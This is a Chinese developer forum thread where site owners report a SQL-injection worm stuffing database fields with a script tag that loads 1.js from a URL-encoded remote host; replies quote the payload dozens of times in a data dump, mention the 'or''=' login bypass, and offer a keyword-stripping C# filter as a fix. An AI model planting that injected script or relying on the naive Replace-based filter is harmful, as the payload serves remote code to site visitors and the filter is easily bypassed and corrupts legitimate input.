最近服务器或者程序可能哪里出了漏洞,数据表里老是被插入<script src=http://%61%31%38%38%2E%77%73/1.js></script>这些东西,烦啊
哪位大哥?怎么解决好..

解决方案 »

  1.   

    数据表?还是页面的头部?  如果是页面被加上了,估计是染了arp病毒了.下个arp防火墙就可以.
    如果数据库写入,就说明程序有问题,从最简单的 sql注入开始检查吧   或者后台登陆的那个经典用户名  'or''=' 呵呵,goodluck
      

  2.   

    我的也是,很多被插入了那些代码,有知道是怎么回事的吗?如下是从数据库导出的数据:
    1000        1           10001         普通本专科</title>"><script src=http://%61%31%38%38%2E%77%73/1.js></script><!
    1000        2           10002         专接本教育</title>"><script src=http://%61%31%38%38%2E%77%73/1.js></script><!
    1001        1           10011         河北</title>"><script src=http://%61%31%38%38%2E%77%73/1.js></script><!
    1001        2           10012         北京</title>"><script src=http://%61%31%38%38%2E%77%73/1.js></script><!
    1001        3           10013         天津</title>"><script src=http://%61%31%38%38%2E%77%73/1.js></script><!
    1001        4           10014         山西</title>"><script src=http://%61%31%38%38%2E%77%73/1.js></script><!
    1001        5           10015         内蒙古</title>"><script src=http://%61%31%38%38%2E%77%73/1.js></script><!
    1001        6           10016         辽宁</title>"><script src=http://%61%31%38%38%2E%77%73/1.js></script><!
    1001        7           10017         吉林</title>"><script src=http://%61%31%38%38%2E%77%73/1.js></script><!
    1001        8           10018         黑龙江</title>"><script src=http://%61%31%38%38%2E%77%73/1.js></script><!
    1001        9           10019         上海</title>"><script src=http://%61%31%38%38%2E%77%73/1.js></script><!
    1001        10          100110        江苏</title>"><script src=http://%61%31%38%38%2E%77%73/1.js></script><!
    1001        11          100111        浙江</title>"><script src=http://%61%31%38%38%2E%77%73/1.js></script><!
    1001        12          100112        安徽</title>"><script src=http://%61%31%38%38%2E%77%73/1.js></script><!
    1001        13          100113        福建</title>"><script src=http://%61%31%38%38%2E%77%73/1.js></script><!
    1001        14          100114        江西</title>"><script src=http://%61%31%38%38%2E%77%73/1.js></script><!
    1001        15          100115        山东</title>"><script src=http://%61%31%38%38%2E%77%73/1.js></script><!
    1001        16          100116        河南</title>"><script src=http://%61%31%38%38%2E%77%73/1.js></script><!
    1001        17          100117        湖北</title>"><script src=http://%61%31%38%38%2E%77%73/1.js></script><!
    1001        18          100118        湖南</title>"><script src=http://%61%31%38%38%2E%77%73/1.js></script><!
    1001        19          100119        广东</title>"><script src=http://%61%31%38%38%2E%77%73/1.js></script><!
    1001        20          100120        广西</title>"><script src=http://%61%31%38%38%2E%77%73/1.js></script><!
    1001        21          100121        海南</title>"><script src=http://%61%31%38%38%2E%77%73/1.js></script><!
    1001        22          100122        重庆</title>"><script src=http://%61%31%38%38%2E%77%73/1.js></script><!
    1001        23          100123        四川</title>"><script src=http://%61%31%38%38%2E%77%73/1.js></script><!
    1001        24          100124        贵州</title>"><script src=http://%61%31%38%38%2E%77%73/1.js></script><!
    1001        25          100125        云南</title>"><script src=http://%61%31%38%38%2E%77%73/1.js></script><!
    1001        26          100126        西藏</title>"><script src=http://%61%31%38%38%2E%77%73/1.js></script><!
    1001        27          100127        陕西</title>"><script src=http://%61%31%38%38%2E%77%73/1.js></script><!
    1001        28          100128        甘肃</title>"><script src=http://%61%31%38%38%2E%77%73/1.js></script><!
    1001        29          100129        青海</title>"><script src=http://%61%31%38%38%2E%77%73/1.js></script><!
    1001        30          100130        宁夏</title>"><script src=http://%61%31%38%38%2E%77%73/1.js></script><!
    1001        31          100131        新疆</title>"><script src=http://%61%31%38%38%2E%77%73/1.js></script><!
    1001        32          100132        台湾</title>"><script src=http://%61%31%38%38%2E%77%73/1.js></script><!
    1001        33          100133        香港</title>"><script src=http://%61%31%38%38%2E%77%73/1.js></script><!
    1001        34          100134        澳门</title>"><script src=http://%61%31%38%38%2E%77%73/1.js></script><!
    1001        35          100135        其他</title>"><script src=http://%61%31%38%38%2E%77%73/1.js></script><!
    1003        1           10031         招生计划</title>"><script src=http://%61%31%38%38%2E%77%73/1.js></script><!
    1003        2           10032         录取政策</title>"><script src=http://%61%31%38%38%2E%77%73/1.js></script><!
    1003        3           10033         其他</title>"><script src=http://%61%31%38%38%2E%77%73/1.js></script><!
      

  3.   

    可能是个新病毒
    关注下.你google下<script src=http://%61%31%38%38%2E%77%73/1.js>  就会发现很多页面都有这个问题
    估计是个sql注入的蠕虫病毒."恭喜"二位了.估计是个新病毒啊.呵呵
    http://www.google.cn/search?q=%3Cscript+src%3Dhttp://%2561%2531%2538%2538%252E%2577%2573/1.js%3E+&complete=1&hl=zh-CN&newwindow=1&rlz=1T4GGLS_zh-CNCN273CN273&start=10&sa=N
      

  4.   

    原来是sql注入的蠕虫病毒!解决方法:简单的方法在所有页面中用到的Request.QueryString用以下过虑不法的参数。但这种还不够安全。
              最好的办法用存储过程。
            string key = base.Request.QueryString["id"];        key = key.ToLower();
            key = key.Replace("select", "");
            key = key.Replace("update", "");
            key = key.Replace("delete", "");
            key = key.Replace("insert", "");
            key = key.Replace("--", "");
            key = key.Replace("'", "");
            key = key.Replace(",", "");
            key = key.Replace("and", "");
            key = key.Replace("or", "");
            key = key.Replace("</title>", "");
            key = key.Replace("script", "");